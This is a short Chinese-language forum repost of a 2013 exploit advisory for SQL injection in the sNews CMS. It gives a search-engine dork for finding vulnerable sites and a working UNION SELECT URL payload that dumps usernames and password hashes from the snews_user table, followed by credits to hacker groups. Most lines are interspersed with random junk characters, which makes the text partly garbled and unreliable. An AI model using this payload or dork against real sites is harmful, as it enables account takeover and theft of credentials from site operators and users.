标题: CMS snews SQL Injection Vulnerability
% |! u4 a- l, P3 A作者: By onestree! w) ?: B- L5 T
下载地址 : http://snewscms.com/
% e$ c) R9 f9 T* Z5 _5 ~! g& A测试平台 : ubuntu 12.10 / win 7( D6 `) h5 ^2 \
关键词: inurl:"tanyakan pada rumput yang bergoyang"* l& |0 t; U# w4 _, V" B
$ G! `2 c+ O6 Z9 H y
9 I8 q6 Y! _- m1 M D! Y+ q% z- k O
*************************************************************
. `3 m' H5 `3 I* y
% s# A7 |- @4 {) g* |SQL poc:& f; y* \! W2 U
' B. g5 {' A1 y& W
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
+ s# k! i1 ]0 u) V. \0 I 7 R3 i. j7 U& s- R. M
示例
/ r+ S( X. I8 W
+ p5 v# @* ?: a$ C3 i; chttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*5 b( C1 m: c- G q5 Z. |& _) n
7 R0 _& T# l1 Q0 ?
# T7 d5 ?5 q+ I致谢:
$ v- V' T) C- ?/ {1 Z
, g! p+ g$ {, y, N# d l Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
: c; c, {# W) J) I: D/ G4 h. U+ ?7 I/ j" z
4 ~$ }9 x1 Y) v% Y8 ?! d indonesiancoder - moeslimh4x0r - go-coder
; G+ I; j2 Q' Q4 Z # E; z3 X" w/ Z/ G7 e% s# U& n
spesial my hunny :*0 p9 ~+ O, k& w0 T, k+ e8 W# t
|
发表于 2013-1-23 08:55:06
收藏
支持
反对